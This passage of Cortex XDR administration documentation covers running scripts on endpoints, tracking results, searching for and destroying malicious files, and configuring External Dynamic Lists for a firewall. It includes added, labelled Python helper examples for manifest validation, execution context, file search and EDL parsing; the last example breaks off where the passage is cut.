To Run by entry point, you must specify the entry point name, and all input and output definitions.
The available parameter types are:
• auto_detect
• boolean
• number
• string
• ip
• number_list
• string_list
• ip_list
To set the script to Just run, leave both entry_point and entry_point_definition empty:

{
  "name":"script name",
  "description":"script description",
  "outcome":"High Risk|Standard",
  "platform":"Windows,macOS,Linux",
  "timeout":600,
  "entry_point":"",
  "entry_point_definition":{}
}
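Because the manifest must be a single line with no \n or \t characters and validation rejects anything else, it is easier to generate and check it than to hand-edit it. The following is an added example, not part of the Cortex XDR documentation or product: build_manifest, validate_manifest and to_single_line are hypothetical helper names; the key names, outcome values, platform names and parameter types are the ones the manifest format above lists. The check_file script, its parameters and the "Just run" cleanup script used in the usage are constructed.

```python
import json

# Added example, not part of the Cortex XDR documentation or product. The
# function names are assumptions; the keys and allowed values below are the
# ones the documented manifest format uses.

OUTCOMES = {"High Risk", "Standard"}
PLATFORMS = {"Windows", "macOS", "Linux"}
PARAM_TYPES = {"auto_detect", "boolean", "number", "string", "ip",
               "number_list", "string_list", "ip_list"}
REQUIRED_KEYS = ("name", "description", "outcome", "platform", "timeout",
                 "entry_point", "entry_point_definition")


def build_manifest(name, description, outcome, platforms, timeout,
                   entry_point="", input_params=(), output_params=()):
    """Assemble the manifest as a dict. An empty entry_point means Just run.

    input_params: iterable of (name, type) tuples.
    output_params: iterable of (name, friendly_name, type) tuples.
    """
    manifest = {
        "name": name,
        "description": description,
        "outcome": outcome,
        "platform": ",".join(platforms),
        "timeout": timeout,
        "entry_point": entry_point,
        "entry_point_definition": {},
    }
    if entry_point:
        manifest["entry_point_definition"] = {
            "input_params": [{"name": n, "type": t} for n, t in input_params],
            "output_params": {
                "type": "JSON",
                "value": [{"name": n, "friendly_name": f, "type": t}
                          for n, f, t in output_params],
            },
        }
    return manifest


def validate_manifest(manifest):
    """Return a list of problems; an empty list means the manifest is well formed."""
    problems = ["missing key: %s" % k for k in REQUIRED_KEYS if k not in manifest]
    if problems:
        return problems
    if manifest["outcome"] not in OUTCOMES:
        problems.append("outcome must be one of %s" % sorted(OUTCOMES))
    for platform in manifest["platform"].split(","):
        if platform not in PLATFORMS:
            problems.append("unknown platform: %r" % platform)
    if not isinstance(manifest["timeout"], int) or manifest["timeout"] <= 0:
        problems.append("timeout must be a positive number of seconds")
    definition = manifest["entry_point_definition"]
    if not manifest["entry_point"]:
        # Just run: the definition object must be empty.
        if definition:
            problems.append("Just run scripts must have an empty entry_point_definition")
        return problems
    params = list(definition.get("input_params", []))
    params += definition.get("output_params", {}).get("value", [])
    for param in params:
        pname = param.get("name", "")
        if pname != pname.lower():
            problems.append("variable names must be lower case: %s" % pname)
        if param.get("type") not in PARAM_TYPES:
            problems.append("unknown type for %s: %r" % (pname, param.get("type")))
    return problems


def to_single_line(manifest):
    """Serialize the manifest with no newlines or tabs, as the upload requires."""
    text = json.dumps(manifest, separators=(",", ":"))
    if "\n" in text or "\t" in text:
        raise ValueError("manifest text contains a newline or tab")
    return text


if __name__ == "__main__":
    # Constructed usage: a manifest for a hypothetical check_file script.
    manifest = build_manifest(
        "check file", "Report whether a file exists", "Standard",
        ["Windows", "Linux"], 120, "check_file",
        [("path", "string"), ("collect", "boolean")],
        [("exists", "Exists", "boolean"), ("sha256", "SHA256", "string"),
         ("files_to_get", "Collected files", "string_list")])
    print(validate_manifest(manifest))  # [] when the manifest is well formed
    print(to_single_line(manifest))
```

Write the result of to_single_line to the definitions file without a trailing newline. The validator checks only what the page states (allowed outcomes, platforms, parameter types, lower-case variable names, and an empty definition for Just run); Cortex XDR performs its own validation on upload.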

Run a Script on Your Endpoints


Follow this high-level workflow to run scripts on your endpoints that perform actions, or retrieve files and
data from the endpoint back to Cortex XDR.

STEP 1 | Initiate a new action to run a script.


From Action Center > +New Action, select Run Script.

STEP 2 | Select an existing script or add a code snippet.


1. To run an existing script, start typing the script name or description in the search field, or scroll down
and select it from the list. Set the script timeout in seconds and any other script parameters, if they
exist. Click Next.
2. Alternatively, you can insert a Code Snippet. Unlike scripts, snippets are not saved in the Cortex XDR
Scripts Library and cannot receive input or output definitions. Write your snippet in the editor, fill in
the timeout in seconds, and click Next.

STEP 3 | Select the target endpoints.


Select the target endpoints on which to execute the script. When you’re done, click Next.

STEP 4 | Review the summary and run script.


Cortex XDR displays the summary of the script execution action. If all the details are correct, Run
the script and proceed to Track Script Execution and View Results. Alternatively, to track the script
execution progress on all endpoints and view the results in real-time, Run in interactive mode.

Run Scripts in Interactive Mode


When you need to run several scripts on the same target scope of endpoints, or when you want to view
and inspect the results of those scripts immediately and interactively, you can run your scripts in Interactive
Mode. You can also initiate interactive mode for an endpoint directly from Endpoints Management. In
this mode, Cortex XDR enables you to track the execution progress on all endpoints in real-time, run more
scripts or code snippets as you go, and view the results of these scripts all in one place.

In Interactive Mode, Cortex XDR displays general information that includes the scope of target endpoints
and a list of all the scripts that are being executed in this session. For each script on the executed scripts list,
you can view the following:
• The script name, date and time the script execution action was initiated, and a list of input parameters.
• A progress bar that indicates in real time the number of endpoints for which the script execution is In
Progress, Failed, or Completed. When you hover over the progress bar, you can drill down for more
information about the different sub-statuses included in each group. Similarly, you can also view this
information on the scripts list to the left in the form of a pie chart that is dynamically updated per script
as it is being executed.

Cortex XDR does not include disconnected endpoints in the visualization of the script
execution progress bar or pie chart. If a disconnected endpoint later gets connected,
Cortex XDR will execute the script on that endpoint and the graphic indicators will change
accordingly to reflect the additional run and its status.
• Dynamic script results that are continuously updated throughout the script execution progress. Cortex
XDR lists the results, and graphically aggregates results only if they have a small variety of values. When
both views are available, you can switch between them.
While in Interactive Mode, you can continuously execute more scripts and add code snippets that will be
immediately executed on the target endpoints scope. Cortex XDR logs all the scripts and code snippets you
execute in Interactive Mode, and you can later view them in the Action Center.

• To add another script, select the script from the Cortex XDR scripts library, or start typing a
Code Snippet. Set the script timeout and input parameters as necessary, and Run when you
are done. The script is added to the executed scripts list and its runtime data is immediately
displayed on screen.

Track Script Execution and View Results


After you run a script, you see the script execution action in the Action Center.

From the Action Center, you can:
• Track Script Execution Status
• Cancel or Abort Script Execution
• View Script Execution Results
• Open Script Interactive Mode
• Rerun a Script
Track Script Execution Status
All script execution actions are logged in the Action Center. The Status indicates the action progress, which
includes the general action status and the breakdown by endpoints included in the action. The following
table lists the possible statuses of a script execution action for each endpoint, in alphabetical order:

Status                    Description

Aborted                   The script execution action was aborted after it was already In Progress on the
                          endpoint.

Canceled                  The script execution action was canceled from Cortex XDR before the Cortex XDR
                          agent pulled the request from the server.

Completed Successfully    The script was executed successfully on the endpoint with no exceptions.

Expired                   Script execution actions expire after four days. After an action expires, the
                          status of any remaining Pending actions on endpoints changes to Expired and
                          these endpoints will not receive the action.

Failed                    A script can fail for these reasons:
                          • The Cortex XDR agent failed to execute the script.
                          • Exceptions occurred during the script execution.
                          To understand why the script execution failed, see Troubleshoot Script Execution.

In Progress               The Cortex XDR agent pulled the script execution request.

Pending                   The Cortex XDR agent has not yet pulled the script execution request from the
                          Cortex XDR server.

Pending Abort             The Cortex XDR agent is in the process of executing the script, and has not
                          pulled the abort request from the Cortex XDR server yet.

Timeout                   The script execution reached its configured timeout and the Cortex XDR agent
                          stopped the execution on the endpoint.

Cancel or Abort Script Execution
Depending on the current status of the script execution action on the target endpoints, you can cancel or
abort the action for Pending and In Progress actions:
• When the script execution action is Pending, the Cortex XDR agent has not pulled the request yet
from Cortex XDR. When you cancel a pending action, the Cortex XDR server pulls back the pending
request and updates the action status as Canceled. To cancel the action for all pending endpoints, go
to the Action Center, right-click the action and Cancel for pending endpoints. Alternatively, to cancel
a pending action for specific endpoints only, go to Action Center > Additional data > Detailed Results,
right-click the endpoint(s) and Cancel pending action.
• When the script execution action is In Progress, the Cortex XDR agent has begun running the script on
the endpoint. When you abort an in-progress action, the Cortex XDR agent halts the script execution on
the endpoint and updates the action status as Aborted. To abort the action for all In Progress endpoints
and cancel the action for any Pending endpoints, go to the Action Center, right-click the action and
Abort and cancel execution. Alternatively, to abort an in-progress action for specific endpoints only, go
to Action Center > Additional data > Detailed Results, right-click the endpoint(s) and Abort for endpoint
in progress.
View Script Execution Results
Cortex XDR logs all script execution actions, including the script results and specific parameters used in
the run. To view the full details about the run, including returned values, right-click the script and select
Additional data.
The script results are divided into two sections. On the upper bar, Cortex XDR displays the script metadata
that includes the script name and entry point, the script execution action status, the parameter values used
in this run and the target endpoints scope. You can also download the exact code used in this run as a .py
file.
In the main view, Cortex XDR displays the script execution results in two formats:
• Aggregated results—A visualization of the script results. Cortex XDR automatically aggregates only
results that have a small variety of values. To see how many of the script results were aggregated
successfully, see the counts on the toggle (for example, aggregated results 4/5). You can filter the
results to adjust the endpoints considered in the aggregation. You can also generate a PDF report of the
aggregated results view.
• Main results view—A detailed table listing all target endpoints and their details.

In addition to the endpoint details (name, IP, domain, etc.), the following table describes both the default
and additional optional fields that you can view per endpoint. The fields are in alphabetical order.

Field                  Description

*Returned values       If your script returned values, the values are also listed in the additional data
                       table according to your script output definitions.

Execution timestamp    The date and time the Cortex XDR agent started the script execution on the
                       endpoint. If the execution has not started yet, this field is empty.

Failed files           The number of files the Cortex XDR agent failed to retrieve from the endpoint.

Retention date         The date after which the retrieved file will no longer be available for download
                       in Cortex XDR. The value is 90 days from the execution date.

Retrieved files        The number of files Cortex XDR successfully retrieved from the endpoint.

Status                 See the list of statuses and their descriptions in Track Script Execution Status.

Standard output        The stdout returned by the script.

For each endpoint, you can right-click and download the script stdout, download retrieved files if there
are any, and view returned exceptions if there are any. You can also Export to file to download the
detailed results table in TSV format.
Open Script Interactive Mode
In Interactive Mode, Cortex XDR enables you to dynamically track the script execution progress on all
target endpoints and view the results as they are being received in real time. Additionally, you can start
executing more scripts on the same scope of target endpoints.
To initiate Interactive Mode for an already running script:

• From the Action Center, right-click the execution action of the relevant script and select Open
in interactive mode.

Rerun a Script
Cortex XDR allows you to select a script execution action and rerun it. When you rerun a script, Cortex
XDR uses the same parameter values, target endpoints, and timeout that were defined for the previous
run. However, if the target endpoints in the original run were defined using a filter, that filter is
recalculated when you rerun the script, so the resulting set of endpoints may differ. Cortex XDR always
uses the current version of the script. If the script has been deleted since the previous run, or its
supported operating system definition has been modified, you cannot rerun it.
To rerun a script:

STEP 1 | From the Action Center, right-click the script you want to rerun and select Rerun.
You are redirected to the final summary stage of the script execution action.

STEP 2 | Run the script.


To run the script with the same parameters and on the same target endpoints as the previous run,
click Done. To change any of the previous run definitions, navigate through the wizard and make the
necessary changes, then click Done. The script execution action is added to the Action Center.

Troubleshoot Script Execution


To understand why a script returned a Failed execution status, you can do the following:
1. Check script exceptions—If the script generated exceptions, you can view them to learn why the script
execution failed. From the Action Center, right-click the Failed script and select Additional data. In
the Script Results table, right-click an endpoint for which the script execution failed and select View
exceptions. Keep in mind that the Cortex XDR agent executes scripts on Windows endpoints as the SYSTEM
account and on Mac and Linux endpoints as root. These accounts have their own environment, so a script
that works from an interactive session can behave differently when the agent runs it: environment
variables such as the home directory, PATH, or proxy settings may be missing or may point at the service
account's profile rather than the logged-on user's, and files the script creates are owned by SYSTEM or root.
2. Validate custom scripts—When a custom script you uploaded failed and the reason is still unclear from
the exceptions, or if the script did not generate any exceptions, try to identify whether it failed because
of an error in Cortex XDR or an error in the script. To identify the error source, execute the script
without the Cortex XDR agent on the same endpoint using a standard Python 3.7 installation. If the script
execution is unsuccessful, fix your script. If the script runs successfully with no errors outside the
agent, contact Palo Alto Networks support.
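The execution-context problem described in item 1 is the most common reason a script that works in a test session fails under the agent. The following Python 3.7 script is an added example written for this page, not code from the guide or from Palo Alto Networks: it prints the identity and environment the script actually runs with (so the downloaded stdout shows them), and it locates per-user files by enumerating profile directories instead of trusting ~ or %USERPROFILE%, which under SYSTEM or root resolve to the service account's profile. The profile roots it assumes (C:\Users on Windows, /home elsewhere) and the sample files in demo() are constructed for the example.

```python
"""Added example, not from the guide: report the context a Cortex XDR-run script actually
executes in, and locate per-user files without relying on ~ or %USERPROFILE%, which under
SYSTEM (Windows) or root (Mac/Linux) point at the service account's profile rather than the
logged-on user's. The profile roots below are assumptions (C:\\Users and /home)."""
import getpass
import os
import platform
import sys
import tempfile
from pathlib import Path
from typing import Dict, List, Optional


def execution_context() -> Dict[str, str]:
    """Facts worth printing to stdout before the real work, so the Script Results view
    shows why an environment-dependent step behaved differently under the agent."""
    try:
        user = getpass.getuser()
    except Exception:  # no USER/LOGNAME and no account entry: can happen under SYSTEM
        user = "<unknown>"
    return {
        "platform": platform.system(),
        "user": user,
        "home_from_env": os.path.expanduser("~"),  # service-account profile when run by the agent
        "python": sys.version.split()[0],
        "path_entries": str(len(os.environ.get("PATH", "").split(os.pathsep))),
    }


def user_home_dirs(root: Optional[Path] = None) -> List[Path]:
    """Enumerate real user profile directories instead of trusting ~.
    root defaults to C:\\Users on Windows and /home elsewhere (assumed layouts)."""
    if root is None:
        root = (Path(os.environ.get("SystemDrive", "C:") + "\\Users")
                if os.name == "nt" else Path("/home"))
    if not root.is_dir():
        return []
    skip = {"Public", "Default", "Default User", "All Users", "lost+found"}
    return sorted(p for p in root.iterdir()
                  if p.is_dir() and p.name not in skip and not p.name.startswith("."))


def find_in_profiles(relative: str, root: Optional[Path] = None) -> List[Path]:
    """Resolve a per-user relative path (for example Downloads/invoice.exe) under every profile."""
    return [home / relative for home in user_home_dirs(root) if (home / relative).exists()]


def demo() -> Dict[str, object]:
    """Constructed fixture: two user profiles and a Public folder in a temporary directory."""
    base = Path(tempfile.mkdtemp(prefix="xdr-ctx-demo-"))
    for name in ("alice", "bob", "Public"):
        (base / name / "Downloads").mkdir(parents=True)
    (base / "alice" / "Downloads" / "invoice.exe").write_bytes(b"MZ")
    (base / "Public" / "Downloads" / "invoice.exe").write_bytes(b"MZ")
    return {
        "profiles": [p.name for p in user_home_dirs(base)],
        "hits": [p.relative_to(base).as_posix()
                 for p in find_in_profiles("Downloads/invoice.exe", base)],
    }


if __name__ == "__main__":
    # Print the context first; stdout is what you download from the Script Results table.
    for key, value in execution_context().items():
        print(f"{key}: {value}")
    print(demo())
```

Run it once from an interactive session and once through Cortex XDR on the same endpoint and compare the two stdout captures; the user and home_from_env lines will differ, which is exactly the difference that breaks scripts relying on the interactive user's environment.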

Disable Script Execution


If you want to prevent Cortex XDR from running scripts on a Cortex XDR agent, you can disable this capability
during agent installation or later through Cortex XDR Endpoint Administration. Disabling script
execution is irreversible: if you later want to re-enable this capability on the endpoint, you must reinstall
the Cortex XDR agent. See the Cortex XDR Agent Administrator’s Guide for more information.

Disabling Script Execution does not take effect on scripts that are in progress.

Search and Destroy Malicious Files


To take immediate action on known and suspected malicious files, you can now search and destroy the files
from the Cortex XDR management console. After you identify the presence of the file, you can immediately
destroy the file from any or all endpoints on which the file exists.
The Cortex XDR agent builds a local database on the endpoint with a list of all the files, including their path,
hash, and additional metadata. Depending on the number of files and disk size of each endpoint, it can take
a few days for Cortex XDR to complete the initial endpoint scan and to populate the files database. You
cannot search an endpoint until the initial scan is complete and all file hashes are calculated. After the initial
scan is complete and the Cortex XDR agent retains a snapshot of the endpoint files inventory, the agent
maintains the files database by initiating periodic scans and closely monitoring all actions performed on the
files.
You can search for specific files by file hash, by full path, or by a partial path using wildcards, from the
Action Center or the Query Builder. After you find the file, you can select it in the search results and
destroy it by hash or by path. You can also destroy a file from the Action Center, without performing a
search, if you already know the path or hash. When you destroy a file by hash, all instances of the file on
the endpoint are removed.

The Cortex XDR agent does not include the following in the local files inventory:
• Files that existed on the endpoint and were deleted before the Cortex XDR agent was installed.
• Files whose size exceeds the maximum file size for hash calculations that is preconfigured in
Cortex XDR.
• File types outside the common file types list, if the Agent Settings Profile on the endpoint is
configured to monitor common file types only. You cannot search for or destroy file types that are
not included in that list.

The following are prerequisites to enable Cortex XDR to search and destroy files on your endpoints:

Requirement Description

Licenses and Add-ons • Provision an active Cortex XDR Pro per Endpoint license.
• Ensure the Host Insights Add-on is enabled on your tenant.

Supported Platforms • Windows—Cortex XDR agent 7.2 or a later release.
• Mac—Cortex XDR agent 7.3 or a later release running on macOS 10.15.4
or a later release.
• Linux—Not supported.

Setup and Permissions • Ensure File Search and Destroy is enabled for your Cortex XDR agent.
• Ensure your Cortex XDR role in the hub has File search and Destroy files
permissions.

Search a File
You can search for files on the endpoint by file hash or file path. The search returns all instances of this file
on the endpoint. You can then immediately proceed to destroy all the file instances on the endpoint, or
upload the file to Cortex XDR for further investigation.
• To search for a file from the Query Builder, create a query using Native Search for Finding Files.
• To search for a file from the Action Center wizard:

STEP 1 | From the Action Center select +New Action > File Search.

STEP 2 | Configure the search method:


• To search by hash, enter the file SHA256 value. When you search by hash, you can also search for
deleted instances of this file on the endpoint.
• To search by path, enter the specific path for the file on the endpoint or specify the path using
wildcards. When you provide a partial path or partial file name using *, the search will return all the
results that match the partial expression. Note the following limitations:
• The file path must begin with a drive name, for example: c:\.
• You must specify the exact path folder hierarchy, for example c:\users\user\file.exe. You
must specify the exact path folder hierarchy also when you replace folder names with wildcards,
by using a wildcard for each folder in the hierarchy. For example, c:\*\*\file.exe.
Click Next.

STEP 3 | Select the target endpoints.


Select the target endpoints on which you want to search for the file. Cortex XDR displays only endpoints
eligible for file search. When you’re done, click Next.

STEP 4 | Review the summary and initiate the search.


Cortex XDR displays the summary of the file search action. If you need to change your settings, go Back.
If all the details are correct, click Run. The File search action is added to the Action Center.

STEP 5 | Review the search results.


In the Action Center, you can monitor the action progress in real-time and view the search results for
all target endpoints. For a detailed view of the results, right-click the action and select Additional data.

Cortex XDR displays the search criteria, timestamp, and real-time status of the action on the target
endpoints. You can:
• View results by file (default view)—Cortex XDR displays the first 100 instances of the file from every
endpoint. Each search result includes details about the endpoint (such as endpoint status, name, IP
address, and operating system) and details about the file instance (such as full file name and path,
hash values, and creation and modification dates).
• View the results by endpoint—For each endpoint in the search results, Cortex XDR displays details
about the endpoint (such as endpoint status, name, IP address, and operating system), the search
action status, and details about the file (whether it exists on the endpoint or not, how many instances
of the file exist on the endpoint, and the last time the action was updated).

If not all endpoints in the query scope are connected or the search has not completed, the search action
remains in Pending status in the Action Center.

STEP 6 | (Optional) Destroy a file.


After you have located the malicious file instances on your endpoints, you can destroy all instances of
the file on each endpoint. From the search results Additional data, right-click the file to immediately
Destroy by path, Destroy by hash, or Get file to upload it to Cortex XDR for further examination.
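To make the search rules in Step 2 concrete (a SHA256 match that can optionally include deleted instances, and a path pattern that must start with a drive name and where each * stands for exactly one folder or file name), here is an added Python example written for this page. It is a toy model of the agent's local file inventory, not Palo Alto Networks code, and the file paths, contents and the "deleted" record are constructed for the example.

```python
"""Added example, not from the guide: a toy model of the agent's local file inventory and
the File Search rules above (search by SHA256, optionally including deleted instances, or by
a path whose folder hierarchy is given explicitly or with one '*' per folder). The inventory
contents are constructed for the example."""
import hashlib
import re
from typing import Dict, Iterable, List, NamedTuple, Pattern


class FileRecord(NamedTuple):
    path: str      # full path as the agent recorded it
    sha256: str
    deleted: bool  # deleted after the agent was installed, so still known to the inventory


def build_inventory(files: Dict[str, bytes], deleted: Iterable[str] = ()) -> List[FileRecord]:
    """Hash each file once, as the initial scan does, and remember which were later deleted."""
    gone = set(deleted)
    return [FileRecord(path, hashlib.sha256(content).hexdigest(), path in gone)
            for path, content in files.items()]


def path_pattern_to_regex(pattern: str) -> Pattern[str]:
    """Validate a search path and turn it into a case-insensitive regex.
    The path must start with a drive name, and '*' stands in for exactly one folder or file
    name, so c:\\*\\*\\file.exe matches only paths that are three levels deep."""
    if not re.match(r"^[A-Za-z]:\\", pattern):
        raise ValueError("the file path must begin with a drive name, for example c:\\")
    segments = [re.escape(seg).replace(r"\*", r"[^\\]*") for seg in pattern.split("\\")]
    return re.compile("^" + r"\\".join(segments) + "$", re.IGNORECASE)


def search_by_hash(inventory: List[FileRecord], sha256: str,
                   include_deleted: bool = False) -> List[FileRecord]:
    """All instances of a hash; deleted instances only when asked for, as in the wizard."""
    wanted = sha256.lower()
    return [r for r in inventory if r.sha256 == wanted and (include_deleted or not r.deleted)]


def search_by_path(inventory: List[FileRecord], pattern: str) -> List[FileRecord]:
    """Path search returns only files that currently exist."""
    regex = path_pattern_to_regex(pattern)
    return [r for r in inventory if not r.deleted and regex.match(r.path)]


def demo() -> Dict[str, List[str]]:
    # Constructed sample inventory: the same dropper under several names and locations.
    dropper = b"MZ\x90\x00constructed-sample"
    files = {
        r"c:\users\alice\downloads\invoice.exe": dropper,
        r"c:\users\bob\appdata\roaming\invoice.exe": dropper,
        r"c:\windows\temp\invoice.exe": b"MZ\x90\x00different-file",
        r"c:\users\alice\invoice.exe": dropper,  # deleted after the agent was installed
    }
    inventory = build_inventory(files, deleted=[r"c:\users\alice\invoice.exe"])
    dropper_hash = hashlib.sha256(dropper).hexdigest()
    return {
        "by_hash": sorted(r.path for r in search_by_hash(inventory, dropper_hash)),
        "by_hash_with_deleted": sorted(
            r.path for r in search_by_hash(inventory, dropper_hash, include_deleted=True)),
        "by_path_three_levels": sorted(
            r.path for r in search_by_path(inventory, r"c:\*\*\invoice.exe")),
        "by_path_downloads": sorted(
            r.path for r in search_by_path(inventory, r"c:\users\*\downloads\*.exe")),
    }


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

The point the example makes is the one the limitations above state: c:\*\*\invoice.exe does not find c:\users\alice\downloads\invoice.exe because the hierarchy is one level deeper, whereas a hash search finds every copy regardless of where it was dropped.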

Destroy a File
When you know a file is malicious, you can destroy all its instances on your endpoints directly from Cortex
XDR. You can destroy a file immediately from the File search action result, or initiate a new action from the
Action Center. When you destroy a file, the Cortex XDR agent deletes all the file instances on the endpoint.
• To destroy a file from the file search results, refer to Step 6 above.
• To destroy a file from the Action Center wizard:

STEP 1 | From the Action Center select +New Action > Destroy File.

STEP 2 | To destroy by hash, provide the SHA256 of the file. To destroy by path, specify the exact file
path and file name. Click Next.

STEP 3 | Select the target endpoints.


Select the target endpoints from which you want to remove the file. Cortex XDR displays only endpoints
eligible for file destroy. When you’re done, click Next.

STEP 4 | Review the summary and initiate the action.
Cortex XDR displays the summary of the file destroy action. If you need to change your settings, go
Back. If all the details are correct, click Run. The File destroy action is added to the Action Center.

Manage External Dynamic Lists


An External Dynamic List (EDL) is a text file hosted on an external web server that your Palo Alto Networks
firewall uses to control user access to IP addresses and domains that Cortex XDR has found to be
associated with an alert.
Cortex XDR hosts two external dynamic lists that you can configure and manage from the Cortex XDR
management console:
• IP Addresses EDL
• Domain Names EDL
To maintain an EDL in Cortex XDR, you must meet the following requirements:
• Cortex XDR Pro per TB or Cortex XDR Pro per Endpoint license
• An App Administrator, Privileged Investigator, or Privileged Security Admin role, which include EDL
permissions
• Palo Alto Networks firewall running PAN-OS 9.0 or a later release
• Access to your Palo Alto Networks firewall configuration

STEP 1 | Enable EDL.


1. Navigate to Settings > External Dynamic List.

2. Enable External Dynamic List and enter the Username and Password that the Palo Alto Networks
firewall should use to access the Cortex XDR EDL.

STEP 2 | Record the IP Addresses EDL URL and the Domains EDL URL. You will need these URLs in the
coming steps to point the firewall to these lists.

It is recommended to test the URLs in a browser to confirm they are active. To test, you must supply the
username and password in the URL itself:
• https://username:password@edl-<FQDN>/block_list?type=ip
• https://username:password@edl-<FQDN>/block_list?type=domain
Credentials embedded in a URL end up in browser history, shell history, and proxy logs, so use a dedicated
account for the EDL rather than a personal one, and clear those records where you can.
If your browser does not support authentication in the URL, try one of the following options:
• (For Linux/macOS/Windows) In Postman, enter your IP Addresses and Domain Names URLs and an
Authorization header (Basic Auth) with your username and password.
• (For Linux/macOS/Windows) Enter the following curl commands (curl's -u option accepts the same
credentials without placing them in the URL):
• curl https://username:password@edl-<FQDN>/block_list?type=ip
• curl https://username:password@edl-<FQDN>/block_list?type=domain
• (For Windows PowerShell version 5 and later) Enter the following commands:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$username = "username"
$password = "password"
$base64AuthInfo = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(("{0}:{1}" -f $username,$password)))
Invoke-WebRequest -Uri https://edl-<FQDN>/block_list?type=ip -Headers @{Authorization=("Basic {0}" -f $base64AuthInfo)} -UseBasicParsing

STEP 3 | Save the EDL configuration.

STEP 4 | Enable the firewall to authenticate the Cortex XDR EDL.


1. Download and save the following root certificate: https://certs.godaddy.com/repository/gd-class2-root.crt.
2. On the firewall, select Device > Certificate Management > Certificates and Import the certificate.
Make sure to give the device certificate a descriptive name, and select OK to save the certificate.

3. Select Device > Certificate Management > Certificate Profile and Add a new certificate profile.
4. Give the profile a descriptive name and Add the certificate to the profile.

5. Select OK to save the certificate profile.

STEP 5 | Set the Cortex XDR EDL as the source for a firewall EDL.
For more detailed information about how Palo Alto Networks firewall EDLs work, how you can use
EDLs, and how to configure them, review how to Use an External Dynamic List in Policy.
1. On the firewall, select Objects > External Dynamic Lists and Add a new list.
2. Define the list Type as either IP List or Domain List.
3. Enter the IP Addresses Block List URL or the Domains Block List URL that you recorded in the last
step as the list Source.
4. Select the Certificate Profile that you created in the last step.
5. Select Client Authentication and enter the username and password that the firewall must use to
access the Cortex XDR EDL.
6. Use the Repeat field to define how frequently the firewall retrieves the latest list from Cortex XDR.

7. Click OK to add the new EDL.

STEP 6 | Select Policies > Security and Add or edit a security policy rule to add the Cortex XDR EDL as
match criteria to a security policy rule.
Review the different ways you can Enforce Policy on an External Dynamic List; this topic describes the
complete workflow to add an EDL as match criteria to a security policy rule.
1. Select Policies > Security and Add or edit a security policy rule.
2. In the Destination tab, select Destination Zone and select the external dynamic list as the
Destination Address.
3. Click OK to save the security policy rule and Commit your changes.

You do not need to perform additional commit or make any subsequent configuration changes for
the firewall to enforce the EDL as part of your security policy; even as you update the Cortex XDR
EDL, the firewall will enforce the list most recently retrieved from Cortex XDR.

You can also use the Cortex XDR domain list as part of a URL Filtering profile or as an
object in a custom Anti-Spyware profile; when attached to a security policy rule, a URL
Filtering profile allows you to granularly control user access to the domains on the list.

STEP 7 | Add an IP address or Domain to your EDL.


You can add to your IP address or Domain lists as you triage alerts from the Action Center or throughout
the Cortex XDR management console.

Make sure EDL sizes don’t exceed your firewall model limit.

To add an IP address or Domain from the Action Center, Initiate an Endpoint Action to Add to EDL. You
can choose to enter the IP address or Domain you want to add Manually or choose to Upload File.
During investigation, you can also Add to EDL from the Actions menu that is available from investigation
pages such as the Incidents View, Causality View, IP View, or Quick Launcher.

STEP 8 | At any time, you can view and make changes to the IP addresses and domain names lists.
1. Navigate to Response > Action Center > EDL.

2. Review your IP addresses and domain names lists.


3. If desired, select New Action to add additional IP addresses and domain names.
4. If desired, select one or more IP addresses or domain names, right-click and Delete any entries that
you no longer want included on the lists.
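Two checks from this procedure are worth scripting: the Step 2 retrieval of the list with Basic authentication, and the Step 7 reminder that the list must stay within your firewall model's EDL limit. The following Python is an added example written for this page, not code from the guide or from Palo Alto Networks. fetch_edl() needs network access and a real EDL URL and is not exercised by demo(); DEMO_LIMIT is a made-up number standing in for the per-model limit in the PAN-OS documentation, and the two sample list bodies are constructed. The validator accepts the three IP forms PAN-OS IP lists take (single address, CIDR block, first-last range) and plain hostnames for the domain list.

```python
"""Added example, not part of the guide: retrieve the Cortex XDR EDLs with Basic auth in a
header (not in the URL) and validate their content the way PAN-OS will consume it."""
import base64
import ipaddress
import re
import urllib.request
from typing import Dict, List

# Assumption for the demo only: look up the real limit for your firewall model in the
# PAN-OS documentation. 1000 is a made-up value.
DEMO_LIMIT = 1000

DOMAIN_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def fetch_edl(url: str, username: str, password: str, timeout: int = 15) -> str:
    """GET the list; the credentials travel in an Authorization header, not in the URL."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def valid_ip_entry(entry: str) -> bool:
    """Single address, CIDR block, or first-last range (the forms a PAN-OS IP list accepts)."""
    try:
        if "-" in entry:
            low, high = entry.split("-", 1)
            return ipaddress.ip_address(low) <= ipaddress.ip_address(high)
        ipaddress.ip_network(entry, strict=False)
        return True
    except (ValueError, TypeError):  # TypeError: mixed v4/v6 ends of a range
        return False


def valid_domain_entry(entry: str) -> bool:
    """A hostname of at least two labels; a bare IP address does not belong in the domain list."""
    name = entry.lower().rstrip(".")
    if not 1 <= len(name) <= 253:
        return False
    try:
        ipaddress.ip_address(name)
        return False
    except ValueError:
        pass
    labels = name.split(".")
    return len(labels) >= 2 and all(DOMAIN_LABEL.match(label) for label in labels)


def parse_edl(text: str, list_type: str) -> Dict[str, List[str]]:
    """One entry per line, blank lines skipped, exact duplicates collapsed."""
    validator = {"ip": valid_ip_entry, "domain": valid_domain_entry}[list_type]
    valid: List[str] = []
    invalid: List[str] = []
    seen = set()
    for raw in text.splitlines():
        entry = raw.strip()
        if not entry or entry in seen:
            continue
        seen.add(entry)
        (valid if validator(entry) else invalid).append(entry)
    return {"valid": valid, "invalid": invalid}


def check_capacity(entries: List[str], limit: int) -> Dict[str, object]:
    """Step 7: the firewall silently caps what it loads, so fail loudly here instead."""
    return {"count": len(entries), "limit": limit, "within_limit": len(entries) <= limit}


# Constructed sample bodies standing in for the two EDL responses.
SAMPLE_IP_LIST = "\n".join([
    "203.0.113.7", "198.51.100.0/24", "192.0.2.10-192.0.2.20", "2001:db8::1",
    "203.0.113.7", "300.1.1.1", "not-an-ip", "",
])
SAMPLE_DOMAIN_LIST = "\n".join([
    "evil.example.com", "Updates.Example.NET.", "-bad.example.com", "203.0.113.7",
])


def demo() -> Dict[str, object]:
    ips = parse_edl(SAMPLE_IP_LIST, "ip")
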